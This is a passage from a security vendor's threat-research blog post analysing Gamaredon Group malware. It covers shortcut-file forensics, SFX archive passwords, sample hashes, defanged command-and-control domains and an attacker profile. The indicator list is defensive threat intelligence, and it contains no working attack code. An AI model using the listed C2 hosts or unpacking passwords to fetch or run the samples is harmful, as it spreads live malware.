shortcut.<\/p>\n<p>Another artifact left by the attackers is the password they used to unpack win.exe.<\/p>\n<p>The -p is the argument for WinRAR SFX to use a password when unpacking. So the rest of the string \u2013 fvthbrfycrbte,k.lrb is the password. If you switch your keyboard layout to Russian and type the password characters, you eventually recover an obscene phrase in Russian: \u201c\u0430\u043c\u0435\u0440\u0438\u043a\u0430\u043d\u0441\u043a\u0438\u0435\u0443**\u044e\u0434\u043a\u0438\u201d, that is translated as \u201cAmerican b**tards\u201d. Is this an Easter egg left by the Gamaredon Group?<\/p>\n<p>Next, let\u2019s move to the shortcut internals. Using the parsers of the .lnk structure, we can extract more information from the file. We decided to use <a href=\"https:\/\/code.google.com\/archive\/p\/lnk-parser\/\">LNK Parser<\/a>, a tool that can generate very detailed html reports.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn aem-GridColumn--default--12\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/content\/fortinet-blog\/us\/en\/threat-research\/gamaredon-group-ttp-profile-analysis\/_jcr_content\/root\/responsivegrid\/image_978287538.img.png\" alt=\"Figure 23. Part of the report generated by LNK Parser\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 23. Part of the report generated by LNK Parser<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>As it contains quite a lot of information, we will focus on the most interesting pieces:<\/p>\n<ul>\n<li>The .lnk file was created on 08.04.2019 09:27:06 (UTC).<\/li>\n<li>The shortcut was created on a drive with the serial number: <b style=\"\">3c76-6c45<\/b><\/li>\n<li>Another path is hardcoded in the shortcut \u2013 C:Users<b style=\"\">USER<\/b>win.exe. This is probably the same <b style=\"\">USER<\/b> that created the decoy MS Office documents.<\/li>\n<li>PC NetBIOS name: <b style=\"\">user-pc<\/b><\/li>\n<li>MAC address of the machine: <b style=\"\">08:00:27:BC:C2:24<\/b> (VirtualBox)<\/li>\n<\/ul>\n<p>We decided to use this information to search for any other samples containing the same MAC address, drive serial number, or any other unique data from the shortcut.<\/p>\n<p>Once the samples were found, we analyzed and extracted other pieces of information that could also help us with attribution. The general behavior of the samples found was mostly the same: SFX archive, batch command file, shortcuts. The only different parts were the bait files and sometimes the batch scripts used by the attackers.<\/p>\n<p>First, we looked at a sample very similar to the one we deeply researched \u2013 mirotvorec.rar. The name of the archive is the same as the source of the decoy image shown in figure 4. There were only three main differences we observed: the lack of decoy files (text files and the ssu_zakon.docx), and different icons used for win.exe and winlog.exe. The last one is different. It is user-agent written in the script:<\/p>\n<ul>\n<li>&quot;Mozilla\/5.0 (Linux; <b>Android<\/b> 7.1.1; SM-J510H Build\/NMF26X) Mobile Safari\/537.36&quot;<\/li>\n<\/ul>\n<p>It looks like the criminal actors are still experimenting with the campaign, trying different patterns by changing the bait and slightly modifying the dropper malware.<\/p>\n<p>We also discovered a non-political sample called vpnclient-win-msi-5.0.07.0410-k9.exe. The sample does not use the WinRAR unacev2.dll vulnerability, and indeed contains a legitimate VPN client tool along with a malicious script that is launched in the background. Analyzing the shortcut file used in the sample, we found other interesting information left by the actors.<\/p>\n<p>The sample hash is 5e16a71c7b99cb2780c31af34b268b78525b2b8fed55ff9e7bd4db8b1ba66f90.<\/p>\n<p>Data extracted from the shortcut included:<\/p>\n<ul>\n<li>Created: 19.03.2019 07:49:13 (UTC)<\/li>\n<li>C:UsersCarson1.exe<\/li>\n<li>Carson (C:\u041f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0438)<\/li>\n<li>NetBIOS name: <b style=\"\">user-pc<\/b><\/li>\n<li>Drive serial number: <b style=\"\">3c76-6c45<\/b><\/li>\n<li>MAC address: <b style=\"\">08:00:27:BC:C2:24<\/b><\/li>\n<\/ul>\n<p>Here we can see the username of an attacker OS account \u2013 Carson. The NetBIOS name, hard drive serial number, and MAC address remained the same.<\/p>\n<p>This sample has a slight difference in the unpacking method. This time, instead of the shortcut, the attackers hid the password inside the batch script.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn--default--9 aem-GridColumn aem-GridColumn--offset--default--1\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/content\/fortinet-blog\/us\/en\/threat-research\/gamaredon-group-ttp-profile-analysis\/_jcr_content\/root\/responsivegrid\/image_1792208938.img.png\" alt=\"Figure 24. Password hardcoded in the script\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 24. Password hardcoded in the script<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>As in the previous samples, the password is an obscene phrase in Russian written in an English keyboard layout.<\/p>\n<p>Another sample that caught our attention was a .lnk shortcut file called 6228. The hash of the file is: 995e6e0f90c58c82744545bf133b8c4c17decbe851953b0ffe5b21d625cade7d, and some of the extracted data follows:<\/p>\n<ul>\n<li>Created 01.07.2019 10:36:33 (UTC)<\/li>\n<li>Strings\n<ul>\n<li>_7-ZIP (F:VZLOMSBORKA_SCR)<\/li>\n<li>F:VZLOMSBORKA_SCR_7-ZIPWinRAR.exe<\/li>\n<li>New password used: \u201c<b>dst,bntct,zd;jgegbyljcrbtcerb<\/b>\u201d<br \/> \u00a0<\/li>\n<\/ul>\n<\/li>\n<li>PC NetBIOS name: \u0448\u0430\u043c\u0430\u043d-\u043f\u043a<\/li>\n<li>Drive serial number: <b>3c76-6c45<\/b><\/li>\n<li>MAC address: <b>08:00:27:BC:C2:24<\/b><\/li>\n<\/ul>\n<p>This time, we observe that the malicious actor changed the VM PC name from user-pc to shaman-pc (written in Russian). The MAC address and drive serial number are the same. Other interesting artefacts include the paths they forgot to clean out. The words VZLOM and SBORKA_SCR are correspondingly translated from Russian as Hacking and SCR Constructor. It means they are using other specialized tools to generate .scr malware. These tools, based on the drive letter F, are possibly stored on a USB flash drive or share folder connected to the VM.<\/p>\n<p>Another trace the group left behind is the new SFX unpacking password \u2013 \u201cdst,bntct,zd;jgegbyljcrbtcerb\u201d which is, again, an obscene phrase in Russian written in English keyboard layout.<\/p>\n<p>Besides this, other similar samples were observed:<\/p>\n<p>1.\u00a0<b>0a6aae425a5e36f68b5da69157d2df4e7d836933adfd0696c389097ecb4a0fd7<\/b><\/p>\n<ul>\n<li>LNK shortcut file<\/li>\n<li>Creation date 04\/12\/2019 10:44:08 UTC\n<ul>\n<li>Last modified 05\/06\/2019 11:45:30 UTC;<br \/> \u00a0<\/li>\n<\/ul>\n<\/li>\n<li>New password used: <b>gblfhsuyjqyst<\/b><\/li>\n<\/ul>\n<p>2.\u00a0<b>79fd962eb0c256f32786dab4d42cb416f6c1e6766bf0e2dcafdf5ffa2c5e61c1<\/b><\/p>\n<ul>\n<li>MS Office document<\/li>\n<li>Create date: 2019:07:22 12:08:00 (GMT)<\/li>\n<li>Author: <b>mmkrasny<\/b><\/li>\n<li>Last modified by: <b>\u041a\u043e\u0440\u0438\u0441\u0442\u0443\u0432\u0430\u0447 Windows<\/b><\/li>\n<li>C2: wifc[.]website<\/li>\n<\/ul>\n<p>This sample usesVBA macros to drop a payload. \u00a0Checking the C2, we can see that it is resolved as 5.252.193[.]204. From another malicious domain that shares the same IP address \u2013 wifu[.]site \u2013 an additional sample has been retrieved:<\/p>\n<p>3.\u00a0<b>bc39db24919b69e80bfb534204f4441a162ca336379bf9eb66b038e039889aac<\/b><\/p>\n<ul>\n<li>7zip SFX archive<\/li>\n<li>TimeDateStamp \u2013 31.12.2012 00:38:51 GMT)<\/li>\n<li>Contains 3 files:\n<ul>\n<li>8331.txt<\/li>\n<li>13446.cmd<\/li>\n<li>14638<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<p>Inside the batch script 13446.cmd, which is a bit different from the discussed sample, we found this additional information: <\/p>\n<ul>\n<li>C2: hxxp:\/\/bits-tor[.]host<\/li>\n<li>Contains another password: <b>whevelfrb<\/b><\/li>\n<li>Schedules a task to achieve persistence<\/li>\n<\/ul>\n<p><b>\u00a0<\/b><\/p>\n<p>The information extracted from the samples could now be used to search for any other campaigns ran by this group or link any old campaigns to one actor.<\/p>\n<h2>Attackers Profile<\/h2>\n<p>After we analyzed the data left inside the samples, we went about summarizing the information we had collected about them to get an idea of who hides behind that group.<\/p>\n<p>On one hand, these malicious actors have been operating since mid-2013, so they more than 6 years of experience.<\/p>\n<ul>\n<li>They are not asking for a ransom<\/li>\n<li>They only target information from the military, government, and other high-level Ukrainian sources.<\/li>\n<li>The main infection strategy is spear-phishing, with well-combined bait documents that sometimes cannot be found in public.<\/li>\n<li>They use publicly available legit tools to avoid detection and create their malicious samples.<\/li>\n<\/ul>\n<p>On the other hand, the traces they left in the malware highlight some basic mistakes.<\/p>\n<ul>\n<li>They use poorly-obfuscated batch scripts, that could be easily analyzed<\/li>\n<li>The leftover paths inside the shortcuts contain usernames, folders and file names. For state-sponsored hackers, this is very risky because any possible piece of information could unveil the author<\/li>\n<li>Much of the data is written in Russian and not in Ukrainian<\/li>\n<li>The passwords contain hateful statements in Russian which look like personal messages from the actor. This type of behavior is peculiar to authors seeking self-affirmation, rather than professional cybercriminals.<\/li>\n<\/ul>\n<h2>Conclusion<\/h2>\n<p>While analyzing a campaign run by the Gamaredon group, we discovered the tools they used to prepare the attack and found artifacts left behind by the actors that allowed us to perform a large amount of forensic analysis. No doubt, the group has strong Russian ties if we rely on how much of that language is used in the malware.<\/p>\n<p>Summarizing our observations regarding the Gamaredon group, we can say that the tools and methods used are more likely to be associated with political activists rather than with special services. Unfortunately, we do not have enough proofs to be sure about that. Further monitoring of their campaigns could probably show us the real face of Gamaredon.<\/p>\n<p>-= FortiGuard Lion Team =-<\/p>\n<h2>MITRE ATT&amp;CK Matrix<\/h2>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn--default--9 aem-GridColumn aem-GridColumn--offset--default--1\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/content\/fortinet-blog\/us\/en\/threat-research\/gamaredon-group-ttp-profile-analysis\/_jcr_content\/root\/responsivegrid\/image_646746889.img.png\" alt>         <\/noscript>                   <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<h2>IOC<\/h2>\n<p>5.252.193[.]204 &#8211; Malicious<br \/> hxxp:\/\/lisingrout.ddns[.]net &#8211; Malicious<br \/> hxxp:\/\/bits-tor[.]host &#8211; Malicious<br \/> hxxp:\/\/bits-tor[.]site &#8211; Malicious<br \/> hxxp:\/\/usbqueshions.ddns[.]net &#8211; Malicious<br \/> hxxp:\/\/librework.ddns[.]net &#8211; Malicious<br \/> hxxp:\/\/wifc[.]website &#8211; Malicious<br \/> hxxp:\/\/wifu[.]site &#8211; Malicious<\/p>\n<p>04ed2ad4fa67c8abd635d34017c3d04813690a91282a0446c0505b2af97ce48b &#8211; W32\/PossibleThreat<br \/> 0a6aae425a5e36f68b5da69157d2df4e7d836933adfd0696c389097ecb4a0fd7 &#8211; LNK\/Agent.GP!tr 18cd658fac1dd52a75b4eb6558d06dfe5be0e4db7078d72f663c44507449168c &#8211; BAT\/Pterodo.QW!tr<br \/> 257f7f67c59ec8f3837c7e4c99b1dc20c5cd0273bd940beef46d5e641393be37 &#8211; W32\/Pterodo.RN!tr 258ecb059c15178caed309a4861421d9f2436e70fb36fb1bf05e95d8d8d7c7e3 &#8211; BAT\/Pterodo.SV!tr<br \/> 3725f82661852d89874a3748302bbf27990d25fc10d28831f1ad35a6c6d3b4bd &#8211; LNK\/Agent.GP!tr<br \/> 46638ca3be6cdbd302e84c26bf14bfda6ed0c1353808914b40246c40fdb5b8ed &#8211; W32\/Generic!tr<br \/> 5b2c7b05368d825a4f3b10d74074d0803234f918166436d3e48ef7f9faf66461 -W32\/Pterodo.RN!tr<br \/> 5e16a71c7b99cb2780c31af34b268b78525b2b8fed55ff9e7bd4db8b1ba66f90 &#8211; W32\/Generic!tr<br \/> 6b5f4aea458fb737e213714b3dda51f31b03ccb53a6a0501ee608c1bfd0cebb7 &#8211; BAT\/Pterodo.SV!tr<br \/> 79fd962eb0c256f32786dab4d42cb416f6c1e6766bf0e2dcafdf5ffa2c5e61c1 &#8211; VBA\/Agent.ATF!tr.dldr<br \/> 7ba638e8a53e6d1713b8f045c27170ef4a75c88197c57fffe227ca2ab05271e7 &#8211; BAT\/Agent.GP!tr<br \/> 842612d1afdf78cb8893018f3aeeec7df9f5f0ab245fe8e6d6b28519d0787937 &#8211; BAT\/Pterodo.SV!tr<br \/> 92b474f037796e67cd2f36199a95c9feff46af7e58f4d528567f3f0a857132bf &#8211; LNK\/Agent.GP!tr<br \/> 995e6e0f90c58c82744545bf133b8c4c17decbe851953b0ffe5b21d625cade7d &#8211; LNK\/Agent.GP!tr<br \/> a67167f363c2501d6a1436e5f8c12693d7cf9d2f3ca1f71b21c292f041f91c7a &#8211; W32\/Pterodo.RN!tr<br \/> 3b50342b6cd96f400fbf7f00098a7dfcc9561037e4aa0bad8cfeafbb6f17923b &#8211; Riskware\/PasswordProtected<br \/> bc39db24919b69e80bfb534204f4441a162ca336379bf9eb66b038e039889aac -W32\/Generic.VA!tr<br \/> c7bed1150d1b8b3b97454d1e47b6c246fffc471dd03d5a1d094bdf2d807b8e5e &#8211; LNK\/Agent.GP!tr<br \/> d2bbecda830821ed3a00737c67fecb7985d612af58a31a1ee8488ad0409ed23b &#8211; LNK\/Agent.GP!tr<br \/> e1e31702aad4bd7557a05906eb3004e9a72d77aa57e448379bee9a350cbba657 &#8211; BAT\/Pterodo.SV!tr<br \/> ffc438d33f45ea56935f2bb6fca29e71862ecafb8b7e69ea19abd6df2d255075 &#8211; BAT\/Pterodo.SV!tr\u00a0 \u00a0\u00a0<\/p>\n<p><i>Learn more about\u00a0<a href=\"https:\/\/www.fortinet.com\/fortiguard\/threat-intelligence\/threat-research.html?utm_source=nreleaseblog&amp;utm_campaign=2018-q2-fortiguardlabs-cta\">FortiGuard Labs<\/a>\u00a0and the FortiGuard Security Services\u00a0<a href=\"https:\/\/www.fortinet.com\/support-and-training\/support-services\/fortiguard-security-subscriptions.html?utm_source=blog&amp;utm_campaign=2018-blog-security-services\">portfolio<\/a>.\u00a0<a href=\"https:\/\/www.fortinet.com\/fortiguard\/threat-intelligence\/threat-research.html?utm_source=nreleaseblog&amp;utm_campaign=2018-q2-fortiguardlabs-cta\">Sign up<\/a>\u00a0for our weekly FortiGuard Threat Brief.\u00a0<\/i><\/p>\n<p><i>Read about the FortiGuard\u00a0<a href=\"https:\/\/www.fortinet.com\/support-and-training\/support-services\/fortiguard-security-subscriptions\/security-rating.html?utm_source=blog&amp;utm_campaign=2018-blog-security-rating-service\">Security Rating Service<\/a>, which provides security audits and best practices.<\/i><\/p>\n<\/p><\/div>\n<div class=\"raw-import aem-GridColumn aem-GridColumn--default--12\">\n<div class=\"text-container\"><\/div>\n<\/p><\/div>\n<\/p><\/div>\n<p><a href=\"http:\/\/feedproxy.google.com\/~r\/fortinet\/blog\/threat-research\/~3\/26IW--EI8yU\/gamaredon-group-ttp-profile-analysis.html\" target=\"bwo\" >http:\/\/feeds.feedburner.com\/fortinet\/blog\/threat-research<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><img decoding=\"async\" src=\"\/content\/fortinet-blog\/us\/en\/threat-research\/gamaredon-group-ttp-profile-analysis\/_jcr_content\/root\/responsivegrid\/image_956427934.img.png\"\/><br \/>Learn more about the tactics, techniques, and procedures used by the Gamaredon Group in their latest malicious campaign.&lt;img src=&#8221;http:\/\/feeds.feedburner.com\/~r\/fortinet\/blog\/threat-research\/~4\/26IW&#8211;EI8yU&#8221; height=&#8221;1&#8243; width=&#8221;1&#8243; alt=&#8221;&#8221;\/&gt;<\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10424,10378],"tags":[],"class_list":["post-16137","post","type-post","status-publish","format-standard","hentry","category-fortinet","category-security"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/16137","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=16137"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/16137\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=16137"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=16137"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=16137"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}